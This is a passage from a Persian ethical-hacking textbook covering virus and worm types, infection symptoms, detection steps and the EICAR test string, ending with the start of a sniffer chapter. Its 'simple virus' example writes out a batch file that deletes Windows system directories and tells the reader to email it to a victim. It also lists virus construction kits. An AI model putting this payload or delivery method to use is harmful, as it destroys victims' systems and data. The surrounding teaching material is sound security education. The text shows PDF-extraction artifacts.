اﺑﺰاري دﻳﮕﺮي ﺑﻪ ﻧﺎم sigverif ، ﺑﺮرﺳﻲ ﻣﻲ ﻛﻨﺪ ﻛﻪ ﻛﺪام ﻓﺎﻳﻞ ﻫﺎي ﻣﺎﻳﻜﺮوﺳﺎﻓﺖ ﺑﺼﻮرت دﻳﺠﻴﺘﺎﻟﻲ اﻣﻀﺎ ﺷﺪه اﻧﺪ . ﺑﺮاي اﺟﺮاي sigverif ، ﻣﺮاﺣﻞ زﻳﺮ را اﻧﺠﺎم دﻫﻴﺪ : :

.1 ﺑﺮ روي دﻛﻤﻪ Start ﻛﻠﻴﻚ ﻛﻨﻴﺪ. .2 ﺑﺮ روي Run ﻛﻠﻴﺪ ﻛﻨﻴﺪ. .3 دﺳﺘﻮر sigverif را ﺗﺎﻳﭗ ﻛﻨﻴﺪ و ﺑﺮ روي start ﻛﻠﻴﻚ ﻛﻨﻴﺪ . ﻧﺘﺎﻳﺞ ﻧﺸﺎن داده ﺧﻮاﻫﺪ ﺷﺪ.

System File Checker ، اﺑﺰار دﺳﺘﻮري دﻳﮕﺮي اﺳﺖ ﻛﻪ ﺑﺮرﺳﻲ ﻣﻲ ﻛﻨﺪ آﻳﺎ ﺗﺮوﺟﺎن، ﻓﺎﻳﻠﻲ را ﺟﺎﻳﮕﺰﻳﻦ ﻛﺮده اﺳﺖ ﻳﺎ ﻧﻪ . اﮔﺮ اﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺗﺸﺨﻴﺺ دﻫﺪ ﻛﻪ ﻓﺎﻳﻠﻲ ﺗﻐﻴﻴﺮ ﻛﺮد ه اﺳﺖ، ﻓﺎﻳﻞ ﻣﻨﺎﺳﺐ را از ﭘﻮﺷﻪ Windows\system32\dllcache ﺑﺎزﻳﺎﺑﻲ ﻣﻲ ﻛﻨﺪ و overwrite ﻣﻲ ﻛﻨﺪ . دﺳﺘﻮر اﺟﺮاي System File Checker ، ﺑﺼﻮرت sfc/scannow اﺳﺖ . .

ﺑﺮﺧﻲ از ﻧﺮم اﻓﺰارﻫﺎي آﻧﺘﻲ ﺗﺮوﺟﺎن ﻋﺒﺎرﺗﻨﺪ از : XoftspySE ، Comodo BOClean ، TrojanHunter ، SPYWAREfighter ، Spyware Doctor . .

100

وﻳﺮوس ﻫﺎ و worm ﻫﺎ ﻫﺎ

وﻳﺮوس ﻫﺎ و worm ﻫﺎ ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﺮاي آﻟﻮده ﻛﺮدن ﻳﻚ ﺳﻴﺴﺘﻢ و اﻳﺠﺎد ﺗﻐﻴﻴﺮات در آن ﺑﺮاي اﻳﺠﺎد دﺳﺘﺮﺳﻲ ﺑﺮاي ﻫﻜﺮ اﺳﺘﻔﺎده ﺷﻮﻧﺪ . ﺑﺴﻴﺎري از وﻳﺮوس ﻫﺎ و worm ﻫﺎ، ﺗﺮوﺟﺎن ﻫﺎ و backdoor ﻫﺎ را دارﻧﺪ . در اﻳﻦ روش، ﻳﻚ وﻳﺮوس ﻳﺎ worm ، ﺣﺎﻣﻞ ﻫﺴﺘﻨﺪ ﻛﻪ ﻛﺪﻫﺎي ﻣﺨﺮب ﻫﻤﭽﻮن ﺗﺮوﺟﺎن ﻫﺎ و backdoor ﻫﺎ را از ﺳﻴﺴﺘﻤﻲ ﺑﻪ ﺳﻴﺴﺘﻢ دﻳﮕﺮي اﻧﺘﻘﺎل ﻣﻲ دﻫﻨﺪ . .

ﺗﻔﺎوت ﺑﻴﻦ وﻳﺮوس و worm

ﺗﺸﺎﺑﻪ وﻳﺮوس و worm اﻳﻦ اﺳﺖ ﻛﻪ ﻫﺮ دو ﺟﺰ ﻧﺮم اﻓﺰارﻫﺎي ﻣﺨﺮب ( malware ) ﻫﺴﺘﻨﺪ . وﻳﺮوس، ﺑﺮﻧﺎﻣﻪ اﺟﺮاﻳﻲ دﻳﮕﺮي را آﻟﻮده ﻣﻲ ﻛﻨﺪ و از اﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺑﺮاي اﻧﺘﺸﺎر ﺧﻮد اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . ﻛﺪ وﻳﺮوس داﺧﻞ ﺑﺮﻧﺎﻣﻪ ﺗﺰرﻳﻖ ﻣﻲ ﺷﻮد و زﻣﺎﻧﻴﻜﻪ ﺑﺮﻧﺎﻣﻪ اﺟﺮا ﻣﻲ ﺷﻮد، اﻧﺘﺸﺎر ﻣﻲ ﻳﺎﺑﺪ . ﻣﺜﺎﻟﻲ از ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺣﺎﻣﻞ وﻳﺮوس ﻋﺒﺎرﺗﻨﺪ از : ﻣﺎﻛﺮوﻫﺎ، ﺑﺎزي ﻫﺎ، ﺿﻤﺎﻳﻢ اﻳﻤﻴﻞ، اﺳﻜﺮﻳﭙﺖ ﻫﺎي وﻳﮋوال ﺑﻴﺴﻴﻚ و اﻧﻴﻤﺸﻦ .ﻫﺎ .ﻫﺎ

101

ﺑﺴﻴﺎري از وﻳﺮوس دار اي دو ﻣﺮﺣﻠﻪ ﻫﺴﺘﻨﺪ : ﻣﺮﺣﻠﻪ آﻟﻮده ﺳﺎزي ( Infection ) و ﻣﺮﺣﻠﻪ ﺣﻤﻠﻪ ( Attack ). ).

ﺗﺼﻮﻳﺮ زﻳﺮ زﺮﻃ ﻛﺎر وﻳﺮوس در ﻣﺮﺣﻠﻪ آﻟﻮده ﺳﺎزي را ﻧﺸﺎن ﻣﻲ دﻫﺪ ﻛﻪ ﻓﺎﻳﻞ EXE را ﺑﺮاي آﻟﻮده ﻛﺮدن ﺑﺮﻧﺎﻣﻪ ﻫﺎ، ﺿﻤﻴﻤﻪ ﻣﻲ ﻛﻨﺪ : :

در ﺗﺼﻮﻳﺮ زﻳﺮ ﻧﻴﺰ ﻛﻪ ﻣﺮﺑﻮط ﺑﻪ ﻣﺮﺣﻠﻪ ﺣﻤﻠﻪ اﺳﺖ، ﻛﺎﻣﭙﻴﻮﺗﺮ ﺑﻪ دﻟﻴﻞ fragment ﺷﺪن، ﺧﺎﻣﻮش ﻣﻲ ﺷﻮد : :

102

ﻧﺸﺎﻧﻪ ﻫﺎي ﺣﻤﻠﻪ وﻳﺮوس ﻋﺒﺎرﺗﻨﺪ از : :

• ﻓﺮآﻳﻨﺪﻫﺎ زﻣﺎن ﮔﻴﺮ ﻫﺴﺘﻨﺪ و ﻣﻨﺎﺑﻊ و زﻣﺎن ﺑﻴﺸﺘﺮي را ﺻﺮف ﻣﻲ ﻛﻨﻨﺪ • ﻣﺸﻜﻼت ﺧﺎص ﺳﺨﺖ اﻓﺰاري • اﮔﺮ ﻟﻴﺒﻞ ﻳﻜﻲ از دارﻳﻮﻫﺎ ﺗﻐﻴﻴﺮ ﻛﻨﺪ • اﮔﺮ ﻛﺎﻣﭙﻴﻮﺗﺮ ﺷﻤﺎ ﻣﺮﺗﺒﺎ ﻫﻨﮓ ﻣﻲ ﻛﻨﺪ و ﭘﻴﻐﺎم ﻫﺎي ﺧﻄﺎ ﻣﻲ دﻫﺪ • زﻣﺎﻧﻴﻜﻪ ﺑﺮﻧﺎﻣﻪ ﻫﺎ در ﺣﺎل ا ﺟﺮا ﻫﺴﺘﻨﺪ، ﻛﺎﻣﭙﻴﻮﺗﺮ ﺑﺴﻴﺎر ﻛﻨﺪ اﺳﺖ • ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﺑﺎﻻ ﻧﻤﻲ آﻳﺪ • ﻓﺎﻳﻞ ﻫﺎ و ﻓﻮﻟﺪرﻫﺎ ﺑﺼﻮرت ﻧﺎﮔﻬﺎﻧﻲ ﻧﺎﭘﺪﻳﺪ ﻣﻲ ﺷﻮﻧﺪ ﻳﺎ ﻣﺤﺘﻮاي آﻧﻬﺎ ﺗﻐﻴﻴﺮ ﻣﻲ ﻛﻨﺪ • Internet Explorer ، ﻫﻨﮓ ﻣﻲ ﻛﻨﺪ • دوﺳﺖ ﺷﻤﺎ اﻋﻼم ﻣﻲ ﻛﻨﺪ ﻛﻪ ﭘﻴﺎﻣﻲ از ﺷﻤﺎ درﻳﺎﻓﺖ ﻛﺮده اﺳﺖ اﻣﺎ ﺷﻤﺎ ﻫﺮﮔﺰ ﻫﻤﭽﻴﻦ ﭘﻴﺎم ﻫﺎ را ارﺳﺎل ﻧﻜﺮده اﻳﺪ worm ، ﻧﻮﻋﻲ وﻳﺮوس اﺳﺖ ﺑﺎ اﻳﻦ ﺗﻔﺎوت ﻛﻪ ﺧﻮد را ﻣﻨﺘﺸﺮ ﻣﻲ ﻛﻨﺪ . worm ، ﺧﻮد را ﺑﺼﻮرت ﺧﻮدﻛﺎر از ﺳﻴﺴﺘﻤﻲ ﺑﻪ ﺳﻴﺴﺘﻢ دﻳﮕﺮ ﻣﻨﺘﺸﺮ ﻣﻲ ﻛﻨﺪ اﻣﺎ وﻳﺮوس ﺑﺮاي اﻧﺘﺸﺎر ﺧﻮد ﻧﻴﺎز ﺑﻪ ﺑﺮﻧﺎﻣﻪ د ﻳﮕﺮي دارد . وﻳﺮوس و worm ﻫﺮ دو ﺑﺪون داﻧﺶ ﻳﺎ اﻃﻼع ﻛﺎرﺑﺮ اﺟﺮا ﻣﻲ ﺷﻮﻧﺪ . .

103

اﻧﻮاع وﻳﺮوس

وﻳﺮوس ﻫﺎ ﺑﺮ ﺣﺴﺐ دو ﻓﺎﻛﺘﻮر دﺳﺘﻪ ﺑﻨﺪي ﻣﻲ ﺷﻮﻧﺪ : ﭼﻪ ﭼﻴﺰي و ﭼﮕﻮﻧﻪ آﻟﻮده ﻣﻲ ﻛﻨﻨﺪ . وﻳﺮوس ﻣﻲ ﺗﻮاﻧﺪ ﻋﻨﺎﺻﺮ زﻳﺮ را در ﺳﻴﺴﺘﻢ آﻟﻮده ﻛﻨﺪ : :

• ﺳﻜﺘﻮرﻫﺎي ﺳﻴﺴﺘﻢ • ﻓﺎﻳﻞ ﻫﺎ • ﻣﺎﻛﺮوﻫﺎ • ﻓﺎﻳﻞ ﻫﺎي ﺳﻴﺴﺘﻤﻲ ﻫﻤﭽﻮن DLL و INI • ﻛﻼﺳﺘﺮﻫﺎي دﻳﺴﻚ • ﻓﺎﻳﻞ ﻫﺎي دﺳﺘﻪ اي ( ﻓﺎﻳﻞ ﻫﺎي BAT) • ﻛﺪ ﻣﻨﺒﻊ ( Source code)

ﭼﮕﻮﻧﻪ وﻳﺮوس ﮔﺴﺘﺮش ﻣﻲ ﻳﺎﺑﺪ و ﺳﻴﺴﺘﻢ را آﻟﻮده ﻣﻲ ﻛﻨﺪ

وﻳﺮوس ﻫﺎ ﺑﺮ ﺣﺴﺐ ﺗﻜﻨﻴﻚ آﻟﻮده ﺳﺎزي ﺧﻮد ﺑﻪ اﻧﻮاع زﻳﺮ دﺳﺘﻪ ﺑﻨﺪي ﻣﻲ ﺷﻮﻧﺪ : :

وﻳﺮوس ﻫﺎي polymorphic ( ﭼﻨﺪ رﻳﺨﺘﻲ ): اﻳﻦ وﻳﺮوس ﻫﺎ، ﻛﺪ را ﺑﻪ ﺷﻜﻞ دﻳﮕﺮي رﻣﺰﮔﺬاري ﻣﻲ ﻛﻨﻨﺪ و ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﻪ ﺷﻜﻞﻫﺎي ﻣﺨﺘﻠﻒ ﺗﻐﻴﻴﺮ ﻛﻨﻨﺪ ﺗﺎ از ﺷﻨﺎﺳﺎﻳﻲ ﺷﺪن ﺟﻠﻮﮔﻴﺮي ﻛﻨﻨﺪ . .

وﻳﺮوس ﻫﺎي Stealth: اﻳﻨﻬﺎ، وﻳﮋﮔﻲ ﻫﺎي ﻃﺒﻴﻌﻲ وﻳﺮوس را ﻣﺨﻔﻲ ﻣﻲ ﻛﻨﻨﺪ از ﻗﺒﻴﻞ ﺳﺎﻋﺖ و ﺗﺎرﻳﺦ اﺻﻠﻲ ﻓﺎﻳﻞ، ﺑﻨﺎﺑﺮاﻳﻦ از ﺷﻨﺎﺳﺎﻳﻲ وﻳﺮوس ﺑﻪ ﻋﻨﻮان ﻓﺎ ﻳﻞ ﺟﺪﻳﺪ در ﺳﻴﺴﺘﻢ ﺟﻠﻮﮔﻴﺮي ﻣﻲ .ﺪﻨﻛﻨ .ﺪﻨﻛﻨ

Sparse infector: اﻳﻦ وﻳﺮوس ﻫﺎ، ﺗﻨﻬﺎ ﺑﻌﻀﻲ از ﺳﻴﺴﺘﻢ ﻫﺎ ﻳﺎ ﺑﺮﻧﺎﻣﻪ ﻫﺎ را آﻟﻮده ﻣﻲ ﻛﻨﻨﺪ . .

وﻳﺮوس ﻫﺎي Armored: اﻳﻦ وﻳﺮوس ﻫﺎ ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از ﺷﻨﺎﺳﺎﻳﻲ، رﻣﺰﮔﺬاري ﺷﺪه .اﻧﺪ .اﻧﺪ

104

وﻳﺮوس ﻫﺎي Cavity: اﻳﻦ وﻳﺮوس ﻫﺎ ﺑﻪ ﻧﻮاﺣﻲ ﺧﺎﻟﻲ ﻓﺎﻳﻞ ﻫﺎ ﻣﻲ ﭼﺴﺒﺪ ﺑﻨﺎﺑﺮاﻳﻦ اﻧﺪازه ﻓﺎﻳﻞ را اﻓﺰاﻳﺶ ﻧﻤﻲ دﻫﻨﺪ . .

وﻳﺮوس ﻫﺎي Tunneling: اﻳﻦ وﻳﺮوس ﻫﺎ، از ﻃﺮﻳﻖ ﻳﻚ ﭘﺮوﺗﻜﻞ ﻣﺨﺘﻠﻒ ﻳﺎ رﻣﺰ ﺷﺪه ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از ﺷﻨﺎﺳﺎﻳﻲ ﻳﺎ ﺑﺮاي ﻋﺒﻮر از ﻓﺎﻳﺮوال ارﺳﺎل ﻣﻲ ﺷﻮﻧﺪ . .

وﻳﺮوس Companion ( ﻫﻤﺮاه ): اﻳﻦ وﻳﺮوس ﻫﺎ، ﺑﺮاي ﻫﺮ ﻓﺎﻳﻞ اﺟﺮاﻳﻲ، ﻳﻚ ﻓﺎﻳﻞ ﻫﻤﺮاه ﻣﻲ ﺳﺎزﻧﺪ . ﺑﻨﺎﺑﺮاﻳﻦ، ﻳﻚ وﻳﺮوس companion ، ﻣﻤﻜﻦ اﺳﺖ ﺧﻮد را ﺑﺎ ﻧﺎم notepad.com ذﺧﻴﺮه ﻛﻨﺪ و ﻫﺮ زﻣﺎن ﻛﻪ ﻛﺎرﺑﺮ ﺑﺮﻧﺎﻣﻪ notepad.exe را اﺟﺮا ﻛﺮد، ﻛﺎﻣﭙﻴﻮﺗﺮ، notepad.com ( وﻳﺮوس ) را اﺟﺮا ﻣﻲ ﻛﻨﺪ و ﺳﻴﺴﺘﻢ را آﻟﻮده ﻣﻲ ﻛﻨﺪ . .

وﻳﺮوس ﻫﺎي Camouflage ( اﺳﺘﺘﺎر ): اﻳﻦ وﻳﺮوس ﻫﺎ ﺑﺮاي ﺑﺮﻧﺎﻣﻪ ﻫﺎي دﻳﮕﺮ، ﻇﺎﻫﺮ ﻣﻲ ﺷﻮﻧﺪ . .

وﻳﺮوس ﻫﺎي Bootable CD-ROM: اﻳﻦ وﻳﺮوس ﻫﺎ، زﻣﺎﻧﻴﻜﻪ ﻛﺎﻣﭙﻴﻮﺗﺮ از ﻃﺮﻳﻖ CD-ROM راه اﻧﺪازي ﻣﻲ ﺷﻮد، داده ﻫﺎي ﻫﺎرد دﻳﺴﻚ را ﺧﺮاب ﻣﻲ ﻛﻨﺪ . زﻣﺎﻧﻴﻜﻪ ﻛﺎﻣﭙﻴﻮﺗﺮ را ﺑﺎ اﺳﺘﻔﺎده از CD-ROM راه اﻧﺪازي ﻣﻲ ﻛﻨﻴﺪ، ﺗﻤﺎم داده ﻫﺎ از ﺑﻴﻦ ﻣﻲ روﻧﺪ . آﻧﺘﻲ وﻳﺮوس ﻧﻤﻲ ﺗﻮاﻧﺪ آن را ﻣﺘﻮﻗﻒ ﻛﻨﺪ ﺑﺮاي اﻳﻨﻜﻪ ﺳﻴﺴﺘﻢ از ﻃﺮﻳﻖ CD-ROM راه اﻧﺪازي ﺷﺪه اﺳﺖ . .

105

وﻳﺮوس ﻫﺎي NTFS و Active Directory: اﻳﻦ وﻳﺮوس ﻫﺎ، ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ NTFS ﻳﺎ Active Directory را ﺑﺮ روي ﺳﻴﺴﺘﻢ ﻫﺎي وﻳﻨﺪوزي ﻣﻮرد ﺣﻤﻠﻪ ﻗﺮار ﻣﻲ دﻫﺪ . .

ﻣﺜﺎﻟﻲ از ﻳﻚ وﻳﺮوس ﺳﺎده

ﻳﻚ ﻓﺎﻳﻞ دﺳﺘﻪ اي ( batch file ) ﺑﻪ ﻧﺎم Game.bat ﺑﺎ ﻣﺘﻦ زﻳﺮ ﺑﺴﺎزﻳﺪ : :

@ echo off

Del c:\winnt\system32\*.*

Del c:\winnt\*.*

ﺑﺎ اﺳﺘﻔﺎده از اﺑﺰار bat2com ، آن را ﺑﻪ Game.com ﺗﻐﻴﻴﺮ دﻫﻴﺪ و آن را از ﻃﺮﻳﻖ اﻳﻤﻴﻞ ﺑﻪ ﻗﺮﺑﺎﻧﻲ ارﺳﺎل ﻛﻨﻴﺪ . زﻣﺎﻧﻴﻜﻪ ﻗﺮﺑﺎﻧﻲ آن را اﺟﺮا ﻛﻨﺪ، ﺗﻤﺎم ﻓﺎﻳﻞ ﻫﺎي اﺻﻠﻲ ﻣﻮﺟﻮد در داﻳﺮﻛﺘﻮري WINNT را ﭘﺎك ﻣﻲ ﻛﻨﺪ و وﻳﻨﺪوز ﻏﻴﺮ ﻗﺎﺑﻞ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . .

اﺑﺰارﻫﺎي ﺳﺎﺧﺖ ﺗﺮوﺟﺎن

اﺑﺰارﻫﺎي زﻳﺎدي ﺑﺮاي ﺳﺎﺧﺖ وﻳﺮوس وﺟﻮد دارد . ﺑﺮﺧﻲ از اﻳﻦ اﺑﺰارﻫﺎ ﻋﺒﺎرﺗﻨﺪ از : :

• Kefi's HTML Virus Construction Kit • Virus Creation Laboratory v1.0 • The Smeg Virus Construction Kit • Rajaat's Tiny Flexible Mutator v1.1 • Windows Virus Creation Kit v1.00

ﺗﻜﻨﻴﻚ ﻫﺎي دور زدن آﻧﺘﻲ وﻳﺮوس

ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ اﺳﻜﺮﻳﭙﺖ ﻳﺎ وﻳﺮوﺳﻲ ﺑﻨﻮﻳﺴﺪ ﻛﻪ ﺗﻮﺳﻂ ﻧﺮم اﻓﺰار آﻧﺘﻲ وﻳﺮوس ﻗﺎﺑﻞ ﺷﻨﺎﺳﺎﻳﻲ ﻧﺒﺎﺷﺪ . ﺷﻨﺎﺳﺎﻳﻲ و ﭘﺎك ﻛﺮدن وﻳﺮوس، ﺑﺮ اﺳﺎس اﻣﻀﺎي ﺑﺮﻧﺎﻣﻪ اﺳﺖ . ﺗﺎ زﻣﺎﻧﻴﻜﻪ وﻳﺮوس ﺷﻨﺎﺳﺎﻳﻲ ﻧﺸﻮد و ﺷﺮﻛﺖ ﺗﻮﻟﻴﺪ ﻛﻨﻨﺪه آﻧﺘﻲ وﻳﺮوس، ﻧﺮم اﻓﺰار را آﭘﺪﻳﺖ ﻧﻜﻨﺪ، وﻳﺮوس ﺑﻪ ﺻﻮرت ﻧﺎﺷﻨﺎس ﻲﻗﺎﺑ ﻣﻲ ﻣﺎﻧﺪ . اﻳﻦ ﺮﻣا ﺳﺒﺐ ﻣﻲ ﺷﻮد ﻛﻪ ﻫﻜﺮ ﺑﺘﻮاﻧﺪ ﺑﺮاي ﻣﺪﺗﻲ از دﺳﺖ ﺷﻨﺎﺳﺎﻳﻲ و ﺣﺬف ﺗﻮﺳﻂ آﻧﺘﻲ وﻳﺮوس در اﻣﺎن ﺑﻤﺎﻧﺪ . .

106

روش ﻫﺎي ﺷﻨﺎﺳﺎﻳﻲ وﻳﺮوس

ﺗﻜﻨﻴﻚ ﻫﺎي زﻳﺮ ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ وﻳﺮوس ﻫﺎ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮﻧﺪ : :

• اﺳﻜﻦ ﻛﺮدن • ﺑﺮرﺳﻲ ﻳﻜﭙﺎرﭼﮕﻲ ﺑﺎ checksum ﻫﺎ • ﻣﺸﺎﻫﺪه ﺑﺮ ﻣﺒﻨﺎي اﻣﻀﺎي وﻳﺮس ( virus signature)

ﻓﺮآﻳﻨﺪ ﺗﺸﺨﻴﺺ و ﺣﺬف وﻳﺮوس ﻋﺒﺎرﺗﻨﺪ از : :

.1 ﺣﻤﻠﻪ وﻳﺮوس را ﺗﺸﺨﻴﺺ دﻫﻴﺪ . ﺗﻤﺎم رﻓﺘﺎرﻫﺎي ﻏﻴﺮ ﻋﺎدي ﻧﺸﺎن دﻫﻨﺪه وﻳﺮوس ﻧﻴﺴﺘﻨﺪ. .2 ﭘﺮدازش ﻫﺎ را ﺑﺎ اﺳﺘﻔﺎده از اﺑﺰارﻫﺎﻳﻲ ﻫﻤﭽﻮن netstat.exe ، fport.exe ، listdlls.exe ، handle.exe ، و pslist.exe ردﮔﻴﺮي ﻛﻨﻴﺪ. .3 ﺑﺎر وﻳﺮوس را ﺑﺎ ﺑﺮرﺳﻲ ﻓﺎ ﻳﻞ ﻫﺎي ﭘﺎك ﺷﺪه، ﺟﺎﻳﮕﺰﻳﻦ ﺷﺪه، و ﺗﻐﻴﻴﺮ ﻳﺎﻓﺘﻪ ﺗﺸﺨﻴﺺ دﻫﻴﺪ . ﻓﺎﻳﻞ ﻫﺎي ﺟﺪﻳﺪ، اﺗﺮﺑﻴﻮت ﻫﺎي ﻓﺎﻳﻞ ﺗﻐﻴﻴﺮ داده ﺷﺪه را ﺑﺮرﺳﻲ ﻛﻨﻴﺪ. .4 ﻣﺴﻴﺮ آﻟﻮده ﺳﺎزي آن را ﺑﺪﺳﺖ آورﻳﺪ و آن را اﻳﺰوﻟﻪ ﻛﻨﻴﺪ . ﺳﭙﺲ، آﻧﺘﻲ وﻳﺮوس ﺗﺎن را ﺑﻪ روز رﺳﺎﻧﻲ ﻛﻨﻴﺪ و ﺗﻤﺎم ﺳﻴﺴﺘﻢ ﻫﺎ را ﻣﺠﺪدا اﺳﻜﻦ ﻛﻨﻴﺪ.

ﺑﺎ ﺗﺎﻳﭗ ﻛﺪ زﻳﺮ در ﻳﻚ ﻓﺎﻳﻞ Notepad و ذﺧﻴﺮه آن ﺑﺎ ﻧﺎم EICAR.COM ، ﻣﻲ ﺗﻮاﻧﻴﺪ ﻳﻚ وﻳﺮوس آزﻣﺎﻳﺸﻲ اﻳﺠﺎد ﻛﻨﻴﺪ . زﻣﺎﻧﻴﻜﻪ ﺑﺨﻮاﻫﻴﺪ آن را اﺟﺮا ﻳﺎ ﻛﭙﻲ ﻛﻨﻴﺪ، ﺑﺎﻳﺪ آﻧﺘﻲ وﻳﺮوس ﺷﻤﺎ ﭘﻴﻐﺎم دﻫﺪ . .

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

107

ﻓﺼﻞ ﺷﺸﻢ

Sniffer ﻫﺎ ﻫﺎ

ﻣﻘﺪﻣﻪ

Sniffer ، اﺑﺰاري ﺑﺮاي ﺑﺪﺳﺖ آوردن ﺑﺴﺘﻪ ﻳﺎ ﻓﺮﻳﻢ اﺳﺖ . ﺗﺮاﻓﻴﻚ ﺷﺒﻜﻪ را اﺳﺘﺮاق ﺳﻤﻊ ﻣﻲ ﻛﻨﺪ و آﻧﻬﺎ را ﺑﻪ ﺻﻮرت ﺧﻂ دﺳﺘﻮري ﻳﺎ ﮔﺮاﻓﻴﻜﻲ ﺑﻪ ﻫﻜﺮ ﻧﺸﺎن ﻣﻲ دﻫﺪ . ﺑﻌﻀﻲ از sniffer ﻫﺎي ﭘﻴﺸﺮﻓﺘﻪ، ﺑﺴﺘﻪ ﻫﺎ را اﺳﺘﺮاق ﺳﻤﻊ ﻣﻲ ﻛﻨﻨﺪ و ﻣﻲ ﺗﻮاﻧﻨ ﺪ دوﺑﺎره آﻧﻬﺎ را ﻛﻨﺎر ﻳﻜﺪﻳﮕﺮ ﻗﺮار دﻫﻨﺪ و ﻣﺘﻦ ﻳﺎ اﻳﻤﻴﻞ اﺻﻠﻲ را ﺗﺸﻜﻴﻞ دﻫﻨﺪ . .

Sniffer ﻫﺎ ﺑﺮاي ﺑﺪﺳﺖ آوردن ﺗﺮاﻓﻴﻚ ارﺳﺎل ﺷﺪه ﺑﻴﻦ دو ﺳﻴﺴﺘﻢ ﻣﻮرد اﺳﺘﻔﺎده ﻗﺮار ﻣﻲ ﺪﻧﮔﻴﺮ . ﺑﺴﺘﻪ ﺑﻪ ﻧﺤﻮه اﺳﺘﻔﺎده از sniffer و ﻣﻌﻴﺎرﻫﺎي اﻣﻨﻴﺘﻲ، ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ از sniffer ﺑﺮاي ﻛﺸﻒ ﻧﺎم ﻫﺎي ﻛﺎرﺑﺮي، ﭘﺴﻮردﻫﺎ، و دﻳﮕﺮ اﻃﻼﻋﺎت ﻣﺤﺮﻣﺎﻧﻪ ارﺳﺎل ﺷﺪه در ﺷﺒﻜﻪ ، اﺳﺘﻔﺎده ﻛﻨﺪ . ﺑﺴﻴﺎري از ﺣﻤﻼت ﻫﻚ و ﺑﺮﺧﻲ از اﺑﺰارﻫﺎي ﻫﻚ، ﺑﺮاي ﺑﺪﺳﺖ آوردن اﻃﻼﻋﺎت ﻣﻬﻢ ﻓﺮﺳﺘﺎده ﺷﺪه از ﺳﻴﺴﺘﻢ ﻫﺪف، ﻧﻴﺎز ﺑﻪ sniffer دارﻧﺪ . در اﻳﻦ ﻓﺼﻞ در ﻣﻮرد ﻧﺤﻮه ﻛﺎر sniffer ﻫﺎ و ﺑﺮﺧﻲ از اﺑﺰارﻫﺎي راﻳﺞ sniffer را ﺗﻮﺿﻴﺢ ﺧﻮاﻫﻴﻢ داد . .

ﭘﺮوﺗﻜﻞ ﻫﺎي ﻣﺴﺘﻌﺪ ﺑﺮاي اﺳﺘﺮاق ﺳﻤﻊ

ﻧﺮم اﻓﺰار sniffer ، ﺑ ﺮاي ﺑﺪﺳﺖ آوردن ﺑﺴﺘﻪ ﻫﺎﻳﻲ اﺳﺖ ﻛﻪ ﺑﺠﺎي ارﺳﺎل ﺑﻪ MAC address ﺳﻴﺴﺘﻢ، ﺑﻪ MAC address ﻫﺪف ، ارﺳﺎل ﻣﻲ ﺷﻮﻧﺪ . اﻳﻦ ﻋﻤﻞ، ﺣﺎﻟﺖ ﺑﻲ ﻗﺎﻋﺪه ( promiscuous mode ) ﻧﺎﻣﻴﺪه ﻣﻲ ﺷﻮد . در ﺣﺎﻟﺖ ﻃﺒﻴﻌﻲ، ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﺮ روي ﺷﺒﻜﻪ، ﺗﻨﻬﺎ ﺗﺮاﻓﻴﻜﻲ ﻛﻪ ﺑﻄﻮر ﻣﺴﺘﻘﻴﻢ ﺑﻪ آن MAC address ارﺳﺎل ﻣﻲ ﺷﻮ د، را ﻣﻲ ﺧﻮاﻧﺪ و ﭘﺎﺳﺦ ﻣﻲ دﻫﺪ . در ﺣﺎﻟﺖ ﺑﻲ ﻗﺎﻋﺪه ( promiscuous mode) ، ﺳﻴﺴﺘﻢ ﺗﻤﺎم ﺗﺮاﻓﻴﻚ را ﻣﻲ ﺧﻮاﻧﺪ و آﻧﻬﺎ را ﺑﺮاي ﭘﺮدازش ﺑﻪ sniffer ﻣﻲ ﻓﺮﺳﺘﺪ . ﺑﺎ ﻧﺼﺐ ﻧﺮم اﻓﺰار دراﻳﻮر ﻣﺨﺼﻮص، ﺣﺎﻟﺖ ﺑﻲ ﻗﺎﻋﺪه ( promiscuous mode ) ﺑﺮ روي ﻛﺎرت ﺷﺒﻜﻪ ﻓﻌﺎل ﻣﻲ ﺷﻮد . ﺑﺴﻴﺎري از اﺑﺰارﻫﺎي ﻫﻚ ﺑﺮاي اﺳﺘﺮاق ﺳﻤﻊ ، داراي دراﻳﻮر promiscuous-mode ﺑﺮاي ﺗﺴﻬﻴﻞ اﻳﻦ ﻓﺮآﻳﻨﺪ ﻫﺴﺘﻨﺪ . .

ﭘﺮوﺗﻜﻞ ﻫﺎﻳﻲ ﻛﻪ داده ﻫﺎ را رﻣﺰﮔﺬاري ﻧﻤﻲ ﻛﻨﻨﺪ، ﻣﺴﺘﻌﺪ sniffing ﻫﺴﺘﻨﺪ . ﭘﺮوﺗﻜﻞ ﻫﺎﻳﻲ ﻫﻤﭽﻮن HTTP ، SNMP ، POP3 ، و FTP ﺑﺎ اﺳﺘﻔﺎده از sniffer ، ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﺪﺳﺖ آ ﻳﻨ ﺪ و ﺑﺮاي ﻫﻜﺮ ﻧﻤﺎﻳﺶ داده ﺷﻮﻧﺪ ﺗﺎ اﻃﻼﻋﺎت ﺑﺎ ارزﺷﻲ ﻫﻤﭽﻮن ﻧﺎم ﻫﺎي ﻛﺎرﺑﺮي و ﭘﺴﻮردﻫﺎ را ﺟﻤﻊ آوري ﻛﻨﺪ . .

109

